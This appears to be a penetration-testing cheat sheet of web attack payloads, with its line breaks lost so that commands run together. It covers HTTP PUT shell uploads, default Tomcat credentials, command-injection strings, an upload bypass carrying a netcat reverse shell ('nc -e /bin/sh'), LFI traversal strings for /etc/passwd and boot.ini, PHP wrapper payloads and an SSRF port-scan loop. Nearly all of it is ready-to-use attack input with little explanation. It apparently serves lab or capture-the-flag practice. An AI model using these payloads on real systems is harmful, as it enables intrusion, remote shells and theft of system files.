Payloads

Checking HTTP Methods

curl -i -X OPTIONS http://XXXXnmap --script http-methods --script-args http-methods.url-path='/test' $ipCurl usagecurl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=0xdf&passwd=password"

Shell via Put Method

Put Shellcurl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"curl -X MOVE --header  "Destination:http://ip/asp.asp" "http://ip/asp.txt"

RFI

$ fimap -u "http://$ip/example.php?test="$ https://github.com/lightos/Panoptic/

JBOSS

JMX Console http://$ip:8080/jmxconcole/​

Tomcat Manager Default Credentials

Tomcat manager, try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, admin (emtpy password).​

Command Injection

Command injection`id`| id&& iderror || id%0a id

File upload bypass

content-type:image/gifGIF89a ?ippsec=nc -e /bin/sh ip port

SQL Shell

msql -u root -p\! /bin/sh

LFI

 Linux../../../../../../../../../../etc/passwd..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd../../../../../../../../../../etc/passwd%00..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500​Windows../../../../../../../../../../boot.ini..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini../../../../../../../../../../boot.ini%00..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500Wordlists/usr/share/wordlists/SecLists/Fuzzing/JHADDIX_LFI.txt

LFI Wrappers

LFI Wrappersexpect://http://x.x.x.x/blah?parameter=expect://whoamidata://http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==# the base64 encoded payload is: input://http://x.x.x.x/blah?parameter=php://input# POST data (using Hackbar)

LFI to RCE

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data​

SSRF

for i in $(seq 1 60000); do echo $i; curl -X GET http://ip:60000/url.php?path=http://localhost:$i/ 2> /dev/null | tr -d “\n”; done​